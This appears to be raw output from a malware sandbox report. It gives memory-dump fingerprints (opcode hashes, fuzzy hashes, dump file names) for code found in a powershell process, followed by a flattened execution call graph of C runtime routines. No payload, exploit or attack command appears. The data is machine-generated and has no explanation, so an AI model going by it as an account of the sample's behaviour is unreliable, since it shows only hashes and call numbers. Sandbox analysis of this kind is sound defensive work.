                                                • Opcode ID: 32eeacd5c8902339998210baec0565b4e28c3531e11213a401b707ae21c56a33
                                                • Instruction ID: ec9120bbcfff52af6c310b8ef7f2e16c061c5624976635530614de1def727fc9
                                                • Opcode Fuzzy Hash: 32eeacd5c8902339998210baec0565b4e28c3531e11213a401b707ae21c56a33
                                                • Instruction Fuzzy Hash: A2616334A002498FDB15DFA4C544AADBBF2FF85301F248568E802AF765D778ED89CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05e1b5386665ce803b9fbe998b836d7078dd254615f754b18524c3592c10f379
                                                • Instruction ID: a6bfec10988b726834181a12d284989068221b495570292bf142aa3a3f7a8151
                                                • Opcode Fuzzy Hash: 05e1b5386665ce803b9fbe998b836d7078dd254615f754b18524c3592c10f379
                                                • Instruction Fuzzy Hash: 0E519D70A002049FCB14DF68D884AAEBBF6FF89315F108879E445EB750DB75AC45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ef58e173957839a31ca5c7d8168dac8a6b37370e6110823b20974c9daccca19
                                                • Instruction ID: 0c0cf5948029e049ee526e4a94c906a7e89950b7c32c572d953711e350130046
                                                • Opcode Fuzzy Hash: 1ef58e173957839a31ca5c7d8168dac8a6b37370e6110823b20974c9daccca19
                                                • Instruction Fuzzy Hash: F6614134A002498FDB14DFA4C544AADBBB2FF85301F258568E402AF765D778ED89CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f827656eeb2451e49f7ab0954ab80b1ef31e44a925d8567d945ce8b9799149d6
                                                • Instruction ID: e28c4f92f6d877b91a11637c4afaf3348a403869525632946d62d179709dc2d0
                                                • Opcode Fuzzy Hash: f827656eeb2451e49f7ab0954ab80b1ef31e44a925d8567d945ce8b9799149d6
                                                • Instruction Fuzzy Hash: E141E8F260820ECFCF358F2485417697BA2BFA1364F1440A6E900DF266D775D941CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc8f0973d40bb5ed3d7dd1a87c295f731d88a592453127d867a8e0298f6f89c5
                                                • Instruction ID: 3bd8502dacc07aed461250ebdc45a864f5edab3cb46a3b139207d7c0de21a973
                                                • Opcode Fuzzy Hash: dc8f0973d40bb5ed3d7dd1a87c295f731d88a592453127d867a8e0298f6f89c5
                                                • Instruction Fuzzy Hash: 8A416C70A006099FDB14DFA9C4846ADBBF6FF85341F14883DD446AB794DB74AC85CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bce82ee20559377a7786e5e9a13a7f666cdfb2e6119b633ff1a4992d0ed4340d
                                                • Instruction ID: 9e1868b7d1bee043e3964abd1926ca6541dbf815bce756de7420d681e64918c9
                                                • Opcode Fuzzy Hash: bce82ee20559377a7786e5e9a13a7f666cdfb2e6119b633ff1a4992d0ed4340d
                                                • Instruction Fuzzy Hash: 3F414A35B002108FDB14DF64D595AAE7BB6EF89754F18486CE406EB3A0DB38AC41DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22cb0831c79b1a032eb7a4bf9eb7454a63995526efcac0ead402a0113bff5f58
                                                • Instruction ID: fa87f1accf96ebd8dbbc34566a974624043bb72b3fac24aff50eafbf30086722
                                                • Opcode Fuzzy Hash: 22cb0831c79b1a032eb7a4bf9eb7454a63995526efcac0ead402a0113bff5f58
                                                • Instruction Fuzzy Hash: E741D874A01109EFDB15CBA8D594A9DFBF2AF88304F24C559E804AB361C775ED82CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7e94dcef8852e65e15feb19680e11b7268f8c9ac7e2a92ea658702c6a95d796
                                                • Instruction ID: 7ebd483d00177727105ced284c3eae899ba4b26f1f58112300bc367858248c85
                                                • Opcode Fuzzy Hash: e7e94dcef8852e65e15feb19680e11b7268f8c9ac7e2a92ea658702c6a95d796
                                                • Instruction Fuzzy Hash: 63318130B01218DFDF15EFA4D580AADB7F7AF88305F148469E401AB350DB30AD49CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7fd496d9102f54865edf2608f0400536e8e531464f0aaeea3afc40d94c3cd04c
                                                • Instruction ID: c5a17c3837670ef3ec2972546932fe1743799f19b8c12901a3f6ffa4b5adecbc
                                                • Opcode Fuzzy Hash: 7fd496d9102f54865edf2608f0400536e8e531464f0aaeea3afc40d94c3cd04c
                                                • Instruction Fuzzy Hash: 74311974A005059FCB14CF9DC9809AEFBB1FF89310B2586A9D949AB751C731EC81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6b2b185dd58c30d1db640c69b6663610f81bc65e04801ca858e3659b056f82a
                                                • Instruction ID: 5ca5023d023aed8f9c959bdd9b33d58be9887fd1585f2a85db8c06792c0ddd1e
                                                • Opcode Fuzzy Hash: e6b2b185dd58c30d1db640c69b6663610f81bc65e04801ca858e3659b056f82a
                                                • Instruction Fuzzy Hash: 433178387002049FCB04EF29C448AAEBBF6EF89311F144468E506EB7A1DB75AC81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee82f44492767dcfe7afb3957177a6f4773619172d77de4ad19cdfa3c3e843e4
                                                • Instruction ID: 0c2ca4747ba6182bf734135fe58d7179cb97f0d564835b1e0ed8acf636078d4d
                                                • Opcode Fuzzy Hash: ee82f44492767dcfe7afb3957177a6f4773619172d77de4ad19cdfa3c3e843e4
                                                • Instruction Fuzzy Hash: FA214CB4A042099FCB00CF98C4809AABBF5FF89310B14859AD919EB352C735FD45CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73ae8f54542bd951234bdd97f5f713ed2449af0b3411a0afe1eb4c591f57c9c2
                                                • Instruction ID: 5ce5dd3497a462e1297cd3aac46ba3e41577b26c0d317b8f1ef6a61b61fc3a1c
                                                • Opcode Fuzzy Hash: 73ae8f54542bd951234bdd97f5f713ed2449af0b3411a0afe1eb4c591f57c9c2
                                                • Instruction Fuzzy Hash: 90213B74A042499FCB11CF98D8909AEBBF5FF49310B1585AAD949EB352C731FC41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5543a2405c205aa820ced2a4030c8f59c472280272cf8f9906ed8158a5e2cec
                                                • Instruction ID: 98b472358b066480aa91d9c5259e2e9fd9dad90d01486628bc6171b692118083
                                                • Opcode Fuzzy Hash: f5543a2405c205aa820ced2a4030c8f59c472280272cf8f9906ed8158a5e2cec
                                                • Instruction Fuzzy Hash: 9901D4356053948FC721CF65D818B66BBFADF86214F0884BED498CB652C638E885CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0563e53f161fc4324a3cc68a165110544fa42f32021e6b3655299c5ff3e339d
                                                • Instruction ID: 8e31d97085fe9a608e77ee31738b4b32c9752ac4666ec5daa50d293895023545
                                                • Opcode Fuzzy Hash: d0563e53f161fc4324a3cc68a165110544fa42f32021e6b3655299c5ff3e339d
                                                • Instruction Fuzzy Hash: 15110A74A05109DFDB55CBA8D484A9DFBF2AF88304F24C559E804AB361C775ED86CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 56243eb70fd6992a92f55bc258996d80cb2673a6eb95a0550cfaa62eafa45ea5
                                                • Instruction ID: d9a0ae74dfe5a3811605a448b512e4c94e17ed34d9fc3b39120d3e33be4f01b4
                                                • Opcode Fuzzy Hash: 56243eb70fd6992a92f55bc258996d80cb2673a6eb95a0550cfaa62eafa45ea5
                                                • Instruction Fuzzy Hash: EF014CB4E0424ACFCB40DFA8C4859ADBFF1BF49210F5044AAD505DB322D630A981CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52e32fb1c19a0588f3d30107a80f039e0e920ef23eb285226b2582c6e0ee4e25
                                                • Instruction ID: a834041de3e2a192bd4655c680c64524da731f10d8cf70cb17ee0f65e30fdbdf
                                                • Opcode Fuzzy Hash: 52e32fb1c19a0588f3d30107a80f039e0e920ef23eb285226b2582c6e0ee4e25
                                                • Instruction Fuzzy Hash: 38F078342043408FC721DB25C440A51BFA8AFC2355B1640FED0488F223C334EC46C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2c92dd9b93dfd8647582df774291cbb74ebfef98bfc72b7d8f109b2468a31f4
                                                • Instruction ID: a437f6807acc443e62ff86073a9989e78a1efc8e99c0637bfce4819374d848d6
                                                • Opcode Fuzzy Hash: e2c92dd9b93dfd8647582df774291cbb74ebfef98bfc72b7d8f109b2468a31f4
                                                • Instruction Fuzzy Hash: 9B01F4A160D3C64FCB17D7788855596BF70AF9712071CC4DFE0848F0A3DA25A955CB63
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de41207b531c6c871d0a3feaba2d1fb4f040ec69af4877f63297cc796680066d
                                                • Instruction ID: 633cffd11bf0d580cd90c479de07f0d2d5c917cc2495563101bcc7b80b1a8e73
                                                • Opcode Fuzzy Hash: de41207b531c6c871d0a3feaba2d1fb4f040ec69af4877f63297cc796680066d
                                                • Instruction Fuzzy Hash: FBF0E2352013508FC725DB19D814B92BBF8EFC6255B1A80FED4488B662D775EC4ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e3d8b93a362a7b318c4c0fd13a8bb1acd3a74ba2a0bac9a63a59c44f7b32e94
                                                • Instruction ID: 31a9700cd618354858fdbf256b66070211e739d5871e3c9ab58115179ea217cb
                                                • Opcode Fuzzy Hash: 6e3d8b93a362a7b318c4c0fd13a8bb1acd3a74ba2a0bac9a63a59c44f7b32e94
                                                • Instruction Fuzzy Hash: CBF0DA35A001059FCB15CF9CD890AEEF7B5FF88324F248199E515A72A1C736EC52CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$$cq$$cq
                                                • API String ID: 0-1126079151
                                                • Opcode ID: ea6862f1a0aaf0cecb4d3e599d62e9a6e7a0b8fa68e4d47ef2ab245a0c54a70e
                                                • Instruction ID: 002f02ea13afd953b5eec6f88fc292f6b5da519b9f3073a9164096b43233c694
                                                • Opcode Fuzzy Hash: ea6862f1a0aaf0cecb4d3e599d62e9a6e7a0b8fa68e4d47ef2ab245a0c54a70e
                                                • Instruction Fuzzy Hash: 5601A760A1D38E4FC7274B6818241126F73AF9351071A01A7C181DF393CA999D85C3A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:2.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:2.7%
                                                Total number of Nodes:1660
                                                Total number of Limit Nodes:5
7136->7135 7137 222e571e _free 20 API calls 7136->7137 7137->7135 7140 222e54a7 __fassign 38 API calls 7139->7140 7141 222e6a05 7140->7141 7142 222e6a26 7141->7142 7143 222e6a14 GetOEMCP 7141->7143 7144 222e6a2b GetACP 7142->7144 7145 222e6a3d 7142->7145 7143->7145 7144->7145 7145->7126 7145->7127 7147 222e69f3 40 API calls 7146->7147 7148 222e6e3f 7147->7148 7151 222e6e90 IsValidCodePage 7148->7151 7153 222e6e46 7148->7153 7155 222e6eb5 ___scrt_fastfail 7148->7155 7149 222e2ada _ValidateLocalCookies 5 API calls 7150 222e6cc1 7149->7150 7150->7133 7150->7136 7152 222e6ea2 GetCPInfo 7151->7152 7151->7153 7152->7153 7152->7155 7153->7149 7159 222e6acb GetCPInfo 7155->7159 7232 222e6886 7156->7232 7158 222e68ed 7158->7129 7163 222e6b05 7159->7163 7168 222e6baf 7159->7168 7162 222e2ada _ValidateLocalCookies 5 API calls 7165 222e6c5b 7162->7165 7169 222e86e4 7163->7169 7165->7153 7167 222e8a3e 43 API calls 7167->7168 7168->7162 7170 222e54a7 __fassign 38 API calls 7169->7170 7171 222e8704 MultiByteToWideChar 7170->7171 7173 222e87da 7171->7173 7174 222e8742 7171->7174 7175 222e2ada _ValidateLocalCookies 5 API calls 7173->7175 7176 222e56d0 21 API calls 7174->7176 7179 222e8763 ___scrt_fastfail 7174->7179 7177 222e6b66 7175->7177 7176->7179 7183 222e8a3e 7177->7183 7178 222e87d4 7188 222e8801 7178->7188 7179->7178 7181 222e87a8 MultiByteToWideChar 7179->7181 7181->7178 7182 222e87c4 GetStringTypeW 7181->7182 7182->7178 7184 222e54a7 __fassign 38 API calls 7183->7184 7185 222e8a51 7184->7185 7192 222e8821 7185->7192 7189 222e881e 7188->7189 7190 222e880d 7188->7190 7189->7173 7190->7189 7191 222e571e _free 20 API calls 7190->7191 7191->7189 7193 222e883c 7192->7193 7194 222e8862 MultiByteToWideChar 7193->7194 7195 222e888c 7194->7195 7196 222e8a16 7194->7196 7200 222e56d0 21 API calls 7195->7200 7202 222e88ad 7195->7202 7197 222e2ada _ValidateLocalCookies 5 API calls 7196->7197 7198 222e6b87 7197->7198 7198->7167 7199 222e88f6 MultiByteToWideChar 7201 222e890f 7199->7201 
7214 222e8962 7199->7214 7200->7202 7219 222e5f19 7201->7219 7202->7199 7202->7214 7204 222e8801 __freea 20 API calls 7204->7196 7206 222e8939 7209 222e5f19 11 API calls 7206->7209 7206->7214 7207 222e8971 7208 222e56d0 21 API calls 7207->7208 7212 222e8992 7207->7212 7208->7212 7209->7214 7210 222e8a07 7211 222e8801 __freea 20 API calls 7210->7211 7211->7214 7212->7210 7213 222e5f19 11 API calls 7212->7213 7215 222e89e6 7213->7215 7214->7204 7215->7210 7216 222e89f5 WideCharToMultiByte 7215->7216 7216->7210 7217 222e8a35 7216->7217 7218 222e8801 __freea 20 API calls 7217->7218 7218->7214 7220 222e5c45 _abort 5 API calls 7219->7220 7221 222e5f40 7220->7221 7222 222e5f49 7221->7222 7227 222e5fa1 7221->7227 7225 222e2ada _ValidateLocalCookies 5 API calls 7222->7225 7226 222e5f9b 7225->7226 7226->7206 7226->7207 7226->7214 7228 222e5c45 _abort 5 API calls 7227->7228 7229 222e5fc8 7228->7229 7230 222e2ada _ValidateLocalCookies 5 API calls 7229->7230 7231 222e5f89 LCMapStringW 7230->7231 7231->7222 7233 222e6892 ___DestructExceptionObject 7232->7233 7240 222e5671 RtlEnterCriticalSection 7233->7240 7235 222e689c 7241 222e68f1 7235->7241 7239 222e68b5 _abort 7239->7158 7240->7235 7253 222e7011 7241->7253 7243 222e693f 7244 222e7011 26 API calls 7243->7244 7245 222e695b 7244->7245 7246 222e7011 26 API calls 7245->7246 7247 222e6979 7246->7247 7248 222e571e _free 20 API calls 7247->7248 7249 222e68a9 7247->7249 7248->7249 7250 222e68bd 7249->7250 7267 222e56b9 RtlLeaveCriticalSection 7250->7267 7252 222e68c7 7252->7239 7254 222e7022 7253->7254 7263 222e701e 7253->7263 7255 222e703c ___scrt_fastfail 7254->7255 7256 222e7029 7254->7256 7260 222e706a 7255->7260 7261 222e7073 7255->7261 7255->7263 7257 222e6368 __dosmaperr 20 API calls 7256->7257 7258 222e702e 7257->7258 7259 222e62ac _abort 26 API calls 7258->7259 7259->7263 7262 222e6368 __dosmaperr 20 API calls 7260->7262 7261->7263 7265 222e6368 __dosmaperr 20 API calls 7261->7265 7264 222e706f 7262->7264 7263->7243 7266 
222e62ac _abort 26 API calls 7264->7266 7265->7264 7266->7263 7267->7252 7358 222ea1c6 IsProcessorFeaturePresent 7359 222e7bc7 7360 222e7bd3 ___DestructExceptionObject 7359->7360 7362 222e7c0a _abort 7360->7362 7367 222e5671 RtlEnterCriticalSection 7360->7367 7363 222e7be7 7368 222e7f86 7363->7368 7367->7363 7369 222e7bf7 7368->7369 7370 222e7f94 __fassign 7368->7370 7372 222e7c10 7369->7372 7370->7369 7375 222e7cc2 7370->7375 7489 222e56b9 RtlLeaveCriticalSection 7372->7489 7374 222e7c17 7374->7362 7376 222e7d42 7375->7376 7379 222e7cd8 7375->7379 7378 222e571e _free 20 API calls 7376->7378 7402 222e7d90 7376->7402 7381 222e7d64 7378->7381 7379->7376 7380 222e7d0b 7379->7380 7383 222e571e _free 20 API calls 7379->7383 7389 222e571e _free 20 API calls 7380->7389 7401 222e7d2d 7380->7401 7382 222e571e _free 20 API calls 7381->7382 7384 222e7d77 7382->7384 7388 222e7d00 7383->7388 7390 222e571e _free 20 API calls 7384->7390 7385 222e571e _free 20 API calls 7391 222e7d37 7385->7391 7386 222e7dfe 7393 222e571e _free 20 API calls 7386->7393 7387 222e7d9e 7387->7386 7400 222e571e 20 API calls _free 7387->7400 7403 222e90ba 7388->7403 7395 222e7d22 7389->7395 7396 222e7d85 7390->7396 7392 222e571e _free 20 API calls 7391->7392 7392->7376 7397 222e7e04 7393->7397 7431 222e91b8 7395->7431 7399 222e571e _free 20 API calls 7396->7399 7397->7369 7399->7402 7400->7387 7401->7385 7443 222e7e35 7402->7443 7404 222e90cb 7403->7404 7405 222e91b4 7403->7405 7406 222e90dc 7404->7406 7407 222e571e _free 20 API calls 7404->7407 7405->7380 7408 222e90ee 7406->7408 7409 222e571e _free 20 API calls 7406->7409 7407->7406 7410 222e9100 7408->7410 7411 222e571e _free 20 API calls 7408->7411 7409->7408 7412 222e9112 7410->7412 7414 222e571e _free 20 API calls 7410->7414 7411->7410 7413 222e9124 7412->7413 7415 222e571e _free 20 API calls 7412->7415 7416 222e9136 7413->7416 7417 222e571e _free 20 API calls 7413->7417 7414->7412 7415->7413 7418 222e9148 7416->7418 7419 222e571e _free 20 API 
calls 7416->7419 7417->7416 7420 222e915a 7418->7420 7422 222e571e _free 20 API calls 7418->7422 7419->7418 7421 222e916c 7420->7421 7423 222e571e _free 20 API calls 7420->7423 7424 222e917e 7421->7424 7425 222e571e _free 20 API calls 7421->7425 7422->7420 7423->7421 7426 222e9190 7424->7426 7427 222e571e _free 20 API calls 7424->7427 7425->7424 7428 222e91a2 7426->7428 7429 222e571e _free 20 API calls 7426->7429 7427->7426 7428->7405 7430 222e571e _free 20 API calls 7428->7430 7429->7428 7430->7405 7432 222e921d 7431->7432 7433 222e91c5 7431->7433 7432->7401 7434 222e91d5 7433->7434 7435 222e571e _free 20 API calls 7433->7435 7436 222e91e7 7434->7436 7437 222e571e _free 20 API calls 7434->7437 7435->7434 7438 222e91f9 7436->7438 7439 222e571e _free 20 API calls 7436->7439 7437->7436 7440 222e920b 7438->7440 7441 222e571e _free 20 API calls 7438->7441 7439->7438 7440->7432 7442 222e571e _free 20 API calls 7440->7442 7441->7440 7442->7432 7444 222e7e42 7443->7444 7448 222e7e60 7443->7448 7444->7448 7449 222e925d 7444->7449 7447 222e571e _free 20 API calls 7447->7448 7448->7387 7450 222e7e5a 7449->7450 7451 222e926e 7449->7451 7450->7447 7485 222e9221 7451->7485 7454 222e9221 __fassign 20 API calls 7455 222e9281 7454->7455 7456 222e9221 __fassign 20 API calls 7455->7456 7457 222e928c 7456->7457 7458 222e9221 __fassign 20 API calls 7457->7458 7459 222e9297 7458->7459 7460 222e9221 __fassign 20 API calls 7459->7460 7461 222e92a5 7460->7461 7462 222e571e _free 20 API calls 7461->7462 7463 222e92b0 7462->7463 7464 222e571e _free 20 API calls 7463->7464 7465 222e92bb 7464->7465 7466 222e571e _free 20 API calls 7465->7466 7467 222e92c6 7466->7467 7468 222e9221 __fassign 20 API calls 7467->7468 7469 222e92d4 7468->7469 7470 222e9221 __fassign 20 API calls 7469->7470 7471 222e92e2 7470->7471 7472 222e9221 __fassign 20 API calls 7471->7472 7473 222e92f3 7472->7473 7474 222e9221 __fassign 20 API calls 7473->7474 7475 222e9301 7474->7475 7476 222e9221 __fassign 20 API calls 
7475->7476 7477 222e930f 7476->7477 7478 222e571e _free 20 API calls 7477->7478 7479 222e931a 7478->7479 7480 222e571e _free 20 API calls 7479->7480 7481 222e9325 7480->7481 7482 222e571e _free 20 API calls 7481->7482 7483 222e9330 7482->7483 7484 222e571e _free 20 API calls 7483->7484 7484->7450 7486 222e9258 7485->7486 7487 222e9248 7485->7487 7486->7454 7487->7486 7488 222e571e _free 20 API calls 7487->7488 7488->7487 7489->7374 6924 222ea945 6925 222ea96d 6924->6925 6926 222ea9a5 6925->6926 6927 222ea99e 6925->6927 6928 222ea997 6925->6928 6937 222eaa00 6927->6937 6933 222eaa17 6928->6933 6934 222eaa20 6933->6934 6941 222eb19b 6934->6941 6938 222eaa20 6937->6938 6939 222eb19b __startOneArgErrorHandling 21 API calls 6938->6939 6940 222ea9a3 6939->6940 6942 222eb1da __startOneArgErrorHandling 6941->6942 6947 222eb25c __startOneArgErrorHandling 6942->6947 6951 222eb59e 6942->6951 6944 222eb286 6945 222eb8b2 __startOneArgErrorHandling 20 API calls 6944->6945 6946 222eb292 6944->6946 6945->6946 6949 222e2ada _ValidateLocalCookies 5 API calls 6946->6949 6947->6944 6948 222e78a3 __startOneArgErrorHandling 5 API calls 6947->6948 6948->6944 6950 222ea99c 6949->6950 6952 222eb5c1 __raise_exc RaiseException 6951->6952 6953 222eb5bc 6952->6953 6953->6947 6374 222e5303 6377 222e50a5 6374->6377 6386 222e502f 6377->6386 6380 222e502f 5 API calls 6381 222e50c3 6380->6381 6390 222e5000 6381->6390 6384 222e5000 20 API calls 6385 222e50d9 6384->6385 6387 222e5048 6386->6387 6388 222e2ada _ValidateLocalCookies 5 API calls 6387->6388 6389 222e5069 6388->6389 6389->6380 6391 222e500d 6390->6391 6395 222e502a 6390->6395 6392 222e5024 6391->6392 6393 222e571e _free 20 API calls 6391->6393 6394 222e571e _free 20 API calls 6392->6394 6393->6391 6394->6395 6395->6384 6396 222e7103 GetCommandLineA GetCommandLineW 6954 222eaf43 6955 222eaf4d 6954->6955 6956 222eaf59 6954->6956 6955->6956 6957 222eaf52 CloseHandle 6955->6957 6957->6956 6958 222e8640 6961 222e8657 6958->6961 6962 222e8679 
